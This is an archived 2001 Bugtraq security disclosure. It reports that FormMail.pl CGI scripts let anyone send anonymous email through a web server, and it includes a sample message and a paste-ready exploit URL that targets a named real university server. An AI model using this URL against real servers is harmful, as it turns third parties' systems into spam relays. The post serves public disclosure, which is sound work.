OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Michael Rawls (bugtraqSHADOWSTORM.COM)
Date: Sat Mar 10 2001 - 11:43:43 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi All,
       I did a little playing with FormMail.pl after a run in with a spammer
    abusing our webserver. Apparently ALL FormMail.pl cgi-bin scripts can be
    used to spam anonymously. I found another server with FormMail.pl and
    tried the same exploit to send myself an email and it worked.

    The email will not show the spammer's real IP. Only the web servers IP
    will show. The web server logs will however show the true IP address of
    the spammer.

    ===========
    Actual example of email sent;
    ============
    Return-Path: <apachehum.auc.dk>
    Received: from hercules.humfak.auc.dk (hercules.humfak.auc.dk [130.225.58.9])
            by mail.dancris.com (8.9.3/8.9.3) with ESMTP id RAA14431
            for <spam-lshadowstorm.com>; Sat, 10 Mar 2001 17:19:34 -0700
    Received: from apache by hercules.humfak.auc.dk with local (Exim 3.02 #8)
            id 14bta3-0004tP-00
            for spam-lshadowstorm.com; Sun, 11 Mar 2001 01:19:27 +0100
    To: spam-lshadowstorm.com
    From: ()
    Subject: WWW Form Submission
    Message-Id: <E14bta3-0004tP-00hercules.humfak.auc.dk>
    Date: Sun, 11 Mar 2001 01:19:27 +0100
    X-UIDL: TPj"!bg3"!i:T!!=FU"!

    Below is the result of your feedback form. It was submitted by
    () on Sunday, March 11, 2001 at 01:19:27
    ---------------------------------------------------------------------------

    message: Proof that FormMail.pl can be used to send anonymous spam.

    ---------------------------------------------------------------------------

    Paste the line below in to your web browser URL box as one long single
    line, insert your email in address in place of "emailaddress-to-spam.com",
    and press enter. Now go check your email.

    Begin URL code
    ================
    address-to-spam.co">http://www.hum.auc.dk/cgi-bin/FormMail.pl?recipient=emailaddress-to-spam.co
    m&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymo
    us%20spam.
    ================

    If this technique was not already in use by a spammer I would have kept it
    to myself, but it has already been on my server by a spammer.

    The address "www.hum.auc.dk" can be replaced with the address of ANY
    webserver set up to use FormMail.pl

    -M. Rawls